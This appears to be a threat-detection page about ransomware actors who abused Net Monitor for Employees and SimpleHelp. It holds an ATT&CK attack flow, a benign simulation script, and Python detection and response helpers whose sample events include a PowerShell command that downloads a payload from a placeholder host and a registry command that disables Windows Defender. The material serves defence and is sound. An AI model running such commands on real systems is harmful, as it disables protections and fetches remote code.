Employee Monitoring and SimpleHelp Software Abused in Ransomware Operations
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Threat actors abused Net Monitor for Employees and the SimpleHelp remote management platform to maintain persistent access to victim networks. By operating through legitimate commercial tools, the intruders blended in while downloading follow-on payloads and attempting to deploy Crazy ransomware (a VoidCrypt variant). Overlapping infrastructure—shared C2 domains and IP addresses—suggests the same operator across both incidents. The activity was profit-driven, combining credential/crypto theft monitoring with attempted ransomware extortion.
Investigation
Huntress documented two early-2026 intrusions where Net Monitor for Employees enabled reverse-shell capability and service masquerading, while SimpleHelp provided backup persistence. Analysts observed a renamed vhost.exe download, execution of winpty-agent.exe, and attempts to weaken defenses by tampering with Windows Defender settings. Initial access also involved compromised VPN credentials, and the tools were installed using silent msiexec execution. Multiple copies of the Crazy ransomware binary (encrypt.exe) were dropped, but the ransomware stage failed to run.
Mitigation
Prioritize MFA across all remote access paths, minimize privileged accounts, and segment networks to constrain lateral movement. Audit third-party admin tooling aggressively, and alert on suspicious process chains, silent msiexec installs, and service-name masquerading. Block or monitor known C2 infrastructure and use application control to prevent unauthorized RMM binaries from executing.
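The alerting conditions named above (silent msiexec installs, PowerShell downloads, service-name and binary masquerading, Defender tampering, and a watched agent filename) can be expressed as checks over process-creation telemetry. The block below is an added example written for this page, not Huntress code and not the logic of the listed detection rules; the events are constructed, the field names (Image, CommandLine, ParentImage) are assumed to follow Sysmon Event ID 1, and the `nmep_agtconfig.exe` suffix is taken from the simulation section further down:

```python
"""Added example: detection checks over Sysmon-style process-creation events.

Field names (Image, CommandLine, ParentImage) are assumed to follow Sysmon
Event ID 1; the events below are constructed, not taken from the incidents.
"""
import ntpath
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

# Constructed sample events: one per behaviour the Mitigation section says to
# alert on, plus an interactive (non-silent) msiexec run as a benign control.
SAMPLE_EVENTS: List[Event] = [
    {"Image": "C:\\Windows\\System32\\msiexec.exe",
     "CommandLine": "msiexec.exe /i C:\\Users\\alice\\Downloads\\agent.msi /qn /norestart",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},
    {"Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\svchost.exe",  # svchost.exe outside System32
     "CommandLine": "svchost.exe",
     "ParentImage": "C:\\Windows\\System32\\services.exe"},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -NoProfile -Command \"(New-Object Net.WebClient)"
                    ".DownloadFile('https://example.invalid/vhost.exe','C:\\ProgramData\\vhost.exe')\"",
     "ParentImage": "C:\\Users\\alice\\AppData\\Local\\Temp\\winpty-agent.exe"},
    {"Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\nmep_agtconfig.exe",  # suffix from the simulation
     "CommandLine": "nmep_agtconfig.exe",
     "ParentImage": "C:\\Windows\\explorer.exe"},
    {"Image": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" "
                    "/v DisableAntiSpyware /t REG_DWORD /d 1 /f",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},
    {"Image": "C:\\Windows\\System32\\msiexec.exe",  # benign control: no silent switch
     "CommandLine": "msiexec.exe /i C:\\Deploy\\corp-app.msi",
     "ParentImage": "C:\\Windows\\explorer.exe"},
]

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Binaries that only legitimately run from the Windows system directories.
SYSTEM_ONLY = {"svchost.exe", "lsass.exe", "csrss.exe", "services.exe", "winlogon.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
WATCHED_SUFFIXES = ("nmep_agtconfig.exe",)  # watched agent filename from the page's simulation

INSTALL_SWITCH = re.compile(r"(?:^|\s)[/-](?:i|package|a)\b", re.I)
SILENT_SWITCH = re.compile(r"(?:^|\s)[/-](?:quiet|passive|qn|qb|q)\b", re.I)
DOWNLOAD_PRIMITIVE = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|Invoke-RestMethod|Start-BitsTransfer"
    r"|\b(?:iwr|irm|curl|wget)\b", re.I)
DEFENDER_TAMPER = re.compile(r"Windows Defender.*Disable|Set-MpPreference.*-Disable", re.I)


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def silent_msiexec_install(e: Event) -> bool:
    """msiexec with an install switch and a quiet/no-UI switch."""
    cl = e["CommandLine"]
    return _base(e["Image"]) == "msiexec.exe" and bool(INSTALL_SWITCH.search(cl)) and bool(SILENT_SWITCH.search(cl))


def system_binary_outside_system_dir(e: Event) -> bool:
    """A system-only binary name (e.g. svchost.exe) started from elsewhere."""
    return _base(e["Image"]) in SYSTEM_ONLY and not e["Image"].lower().startswith(SYSTEM_DIRS)


def powershell_download(e: Event) -> bool:
    return _base(e["Image"]) in {"powershell.exe", "pwsh.exe"} and bool(DOWNLOAD_PRIMITIVE.search(e["CommandLine"]))


def shell_from_user_writable_parent(e: Event) -> bool:
    """Suspicious process chain: a shell whose parent lives in a user-writable path."""
    return _base(e["Image"]) in SHELLS and any(m in e["ParentImage"].lower() for m in USER_WRITABLE)


def watched_agent_filename(e: Event) -> bool:
    return _base(e["Image"]).endswith(WATCHED_SUFFIXES)


def defender_tampering(e: Event) -> bool:
    return bool(DEFENDER_TAMPER.search(e["CommandLine"]))


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("silent_msiexec_install", silent_msiexec_install),
    ("system_binary_outside_system_dir", system_binary_outside_system_dir),
    ("powershell_download", powershell_download),
    ("shell_from_user_writable_parent", shell_from_user_writable_parent),
    ("watched_agent_filename", watched_agent_filename),
    ("defender_tampering", defender_tampering),
]


def evaluate(event: Event) -> List[str]:
    """Names of every rule the event satisfies, in RULES order."""
    return [name for name, check in RULES if check(event)]


def triage(events: List[Event]) -> List[Tuple[str, List[str]]]:
    """(Image, matched rules) for every event that fired at least one rule."""
    return [(e["Image"], evaluate(e)) for e in events if evaluate(e)]


if __name__ == "__main__":
    for image, hits in triage(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(hits)}")
```

Each check is deliberately narrow so that a benign interactive `msiexec /i` does not fire, while the PowerShell download event fires twice (the download primitive and the user-writable parent), which is the kind of process-chain signal the mitigation text asks for.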
Response
If detected, isolate affected systems, stop malicious processes, and remove unauthorized RMM services. Preserve key artifacts (binaries, installer traces, logs), block related C2 domains/IPs, and reset any compromised credentials. Perform an environment-wide inventory of admin tools to validate legitimacy, then remediate registry changes and undo any Defender-tampering or security-control disablement attempts.
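The service inventory and registry remediation steps above can be driven from an exported service list. The block below is an added example, not Huntress code or any vendor's tooling; the service records are constructed and shaped like Win32_Service fields (Name, DisplayName, PathName) with an assumed Signer column, the allowlist `APPROVED_RMM` is a hypothetical organisational allowlist, `vhost.exe` and the `nmep_` prefix come from this page, and the Defender policy snapshot is constructed:

```python
"""Added example: post-incident triage of a service inventory plus Windows
Defender policy values. All records are constructed; the Signer column and the
APPROVED_RMM allowlist are assumptions for the example."""
import ntpath
from typing import Dict, List, Set, Tuple

Service = Dict[str, str]

SAMPLE_SERVICES: List[Service] = [
    {"Name": "OneDriveSvc", "DisplayName": "OneDrive Sync Service",
     "PathName": "C:\\Users\\alice\\AppData\\Local\\Temp\\svchost.exe", "Signer": "Unknown"},
    {"Name": "RemoteAccessSvc", "DisplayName": "Remote Access",
     "PathName": "C:\\ProgramData\\RemoteAccess\\vhost.exe", "Signer": "Unknown"},
    {"Name": "CorpRemoteSupport", "DisplayName": "Corp Remote Support",
     "PathName": "\"C:\\Program Files\\CorpRMM\\vhost.exe\" -service", "Signer": "Corp IT"},
    {"Name": "wuauserv", "DisplayName": "Windows Update",
     "PathName": "C:\\Windows\\System32\\svchost.exe -k netsvcs", "Signer": "Microsoft Windows"},
]
# Constructed snapshot of values under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender.
SAMPLE_DEFENDER_POLICY: Dict[str, int] = {"DisableAntiSpyware": 1, "DisableRealtimeMonitoring": 0}
APPROVED_RMM: Set[str] = {"CorpRemoteSupport"}  # hypothetical allowlist keyed by service Name

RMM_BINARIES = {"vhost.exe"}   # SimpleHelp binary name as reported on the page
RMM_PREFIXES = ("nmep_",)      # Net Monitor for Employees agent prefix from the simulation
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
MICROSOFT_WORDS = ("onedrive", "windows", "microsoft", "defender")


def binary_path(pathname: str) -> str:
    """Extract the executable from a service PathName, which may be quoted
    and may carry arguments (e.g. 'svchost.exe -k netsvcs')."""
    p = pathname.strip()
    if p.startswith('"'):
        return p[1:p.index('"', 1)]
    idx = p.lower().find(".exe")
    return p[: idx + 4] if idx != -1 else p.split(" ", 1)[0]


def classify_service(svc: Service, approved: Set[str]) -> List[str]:
    """Reasons a service should be removed; empty list means it looks legitimate."""
    reasons: List[str] = []
    exe = binary_path(svc["PathName"])
    base = ntpath.basename(exe).lower()
    if any(m in exe.lower() for m in USER_WRITABLE):
        reasons.append("user_writable_path")
    names = (svc["Name"] + " " + svc["DisplayName"]).lower()
    if any(w in names for w in MICROSOFT_WORDS) and not svc["Signer"].lower().startswith("microsoft"):
        reasons.append("masquerades_as_microsoft")
    is_rmm = base in RMM_BINARIES or base.startswith(RMM_PREFIXES)
    if is_rmm and svc["Name"] not in approved:
        reasons.append("unauthorized_rmm")
    return reasons


def defender_values_to_reset(policy: Dict[str, int]) -> List[str]:
    """Policy values set to 1 disable protection and should be deleted."""
    return sorted(name for name, data in policy.items() if data == 1)


def build_plan(services: List[Service], policy: Dict[str, int], approved: Set[str]) -> List[Tuple[str, str]]:
    """(target, action) pairs for the responder, services first, then registry."""
    plan: List[Tuple[str, str]] = []
    for svc in services:
        reasons = classify_service(svc, approved)
        if reasons:
            plan.append((svc["Name"], "stop and delete service; preserve "
                         + binary_path(svc["PathName"]) + " (" + ", ".join(reasons) + ")"))
    for value in defender_values_to_reset(policy):
        plan.append((value, "delete Windows Defender policy value and re-enable protection"))
    return plan


if __name__ == "__main__":
    for target, action in build_plan(SAMPLE_SERVICES, SAMPLE_DEFENDER_POLICY, APPROVED_RMM):
        print(f"{target}: {action}")
```

The allowlist is what keeps a sanctioned RMM service from being torn out during response: the approved `CorpRemoteSupport` service runs the same binary name as the flagged one but is left alone, while the copy in ProgramData and the masquerading `OneDriveSvc` both land on the removal list, each with the binary path to preserve before deletion.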
Attack Flow
graph TB
%% Class Definitions
classDef technique fill:#e0f7fa
classDef tool fill:#ffe0b2
classDef process fill:#d1c4e9
%% Nodes
step1["<b>Technique</b> – T1078 Valid Accounts<br/>Compromised vendor SSL VPN credentials used for remote access."]
class step1 technique
step2["<b>Technique</b> – T1021.001 Remote Services: Remote Desktop Protocol<br/>RDP used to access domain controller."]
class step2 technique
step3["<b>Technique</b> – T1218.007 System Binary Proxy Execution: Msiexec<br/>Silently installed Net Monitor for Employees MSI."]
class step3 technique
tool_msiexec["<b>Tool</b> – Msiexec<br/><b>Purpose</b>: Install MSI packages"]
class tool_msiexec tool
step4["<b>Technique</b> – T1036 Masquerading<br/>Service registered as OneDriveSvc, process renamed OneDriver.exe then svchost.exe."]
class step4 technique
step5["<b>Technique</b> – T1136.002 Create Account: Domain Account<br/>Enabled built-in Administrator and created new accounts."]
class step5 technique
step5b["<b>Technique</b> – T1136.001 Create Account: Local Account"]
class step5b technique
step5c["<b>Technique</b> – T1098.007 Additional Local or Domain Groups<br/>Added accounts to privileged groups."]
class step5c technique
step6["<b>Technique</b> – T1012 Query Registry<br/>Modified registry to disable Windows Defender."]
class step6 technique
step6b["<b>Technique</b> – T1553 Subvert Trust Controls<br/>Disabled security controls."]
class step6b technique
step7["<b>Technique</b> – T1059.001 PowerShell<br/>Used winpty-agent.exe to download vhost.exe (SimpleHelp)."]
class step7 technique
tool_winpty["<b>Tool</b> – winpty-agent.exe<br/><b>Function</b>: PowerShell payload downloader"]
class tool_winpty tool
malware_simplehelp["<b>Malware</b> – vhost.exe (SimpleHelp)"]
class malware_simplehelp process
step8["<b>Technique</b> – T1102 Web Service<br/>Bidirectional and One-Way communications via HTTPS with domain fronting."]
class step8 technique
step8b["<b>Technique</b> – T1090.004 Domain Fronting<br/>HTTPS traffic to dronemaker.org and other gateways."]
class step8b technique
step9["<b>Technique</b> – T1087.001 Account Discovery: Local Account<br/>Enumerated local accounts via net commands."]
class step9 technique
step9b["<b>Technique</b> – T1087.002 Account Discovery: Domain Account<br/>Enumerated domain accounts."]
class step9b technique
step10["<b>Technique</b> – T1486 Data Encrypted for Impact<br/>Attempted deployment of Crazy ransomware."]
class step10 technique
malware_crazy["<b>Malware</b> – Crazy ransomware"]
class malware_crazy process
step10b["<b>Technique</b> – T1027.009 Obfuscated Files or Information: Embedded Payloads<br/>Multiple encrypted binaries."]
class step10b technique
step11["<b>Technique</b> – T1574.010 Hijack Execution Flow: Services File Permissions Weakness<br/>Renamed binaries and services to appear legitimate."]
class step11 technique
%% Connections
step1 -->|leads_to| step2
step2 -->|leads_to| step3
step3 -->|uses| tool_msiexec
step3 -->|leads_to| step4
step4 -->|leads_to| step5
step5 -->|related_to| step5b
step5b -->|related_to| step5c
step5c -->|leads_to| step6
step6 -->|modifies| step6b
step6b -->|leads_to| step7
step7 -->|uses| tool_winpty
tool_winpty -->|downloads| malware_simplehelp
malware_simplehelp -->|leads_to| step8
step8 -->|uses| step8b
step8b -->|leads_to| step9
step9 -->|leads_to| step9b
step9b -->|leads_to| step10
step10 -->|delivers| malware_crazy
malware_crazy -->|related_to| step10b
step10b -->|leads_to| step11
Detections
- Possible System Network Configuration Discovery (via cmdline)
- Suspicious MsiExec Remote Installer Hidden Installation Attempts (via cmdline)
- Download or Upload via Powershell (via cmdline)
- Suspicious Binary / Scripts in Autostart Location (via file_event)
- IOCs (DestinationIP) to detect: Employee Monitoring and SimpleHelp Software Abused in Ransomware Operations
- IOCs (SourceIP) to detect: Employee Monitoring and SimpleHelp Software Abused in Ransomware Operations
- IOCs (HashSha256) to detect: Employee Monitoring and SimpleHelp Software Abused in Ransomware Operations
- PowerShell Download of Potentially Malicious File [Windows Powershell]
- Detection of Malicious Use of Employee Monitoring and SimpleHelp Software in Ransomware Operations [Windows Process Creation]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
Attack Narrative & Commands:
- Preparation: The attacker copies a benign Windows binary (calc.exe) to a file named nmep_agtconfig.exe, a watched suffix representing the SimpleHelp agent.
- Execution: The renamed binary is launched, causing Sysmon to log a process creation event whose Image ends with nmep_agtconfig.exe.
- Post-execution: The attacker optionally runs a PowerShell one-liner from within the spawned process to simulate command execution (illustrating T1059), but this extra behavior is not required for the rule to fire.
Regression Test Script:
# Simulation script – triggers the Sigma rule
$src = "$env:SystemRoot\System32\calc.exe"
$dst = "$env:Temp\nmep_agtconfig.exe"
# Copy calc.exe to the masqueraded name
Copy-Item -Path $src -Destination $dst -Force
# Execute the masqueraded binary
$proc = Start-Process -FilePath $dst -PassThru
# Optional: run a harmless command to generate command-line telemetry
Start-Process -FilePath "powershell.exe" -ArgumentList '-NoProfile -Command "Write-Host Simulated payload."' -NoNewWindow
# Output PID for cleanup
Write-Output "Spawned PID: $($proc.Id)"
Cleanup Commands:
# Terminate the masqueraded process if still running
Get-Process -Name "nmep_agtconfig" -ErrorAction SilentlyContinue | Stop-Process -Force
# Remove the file from disk
Remove-Item -Path "$env:Temp\nmep_agtconfig.exe" -Force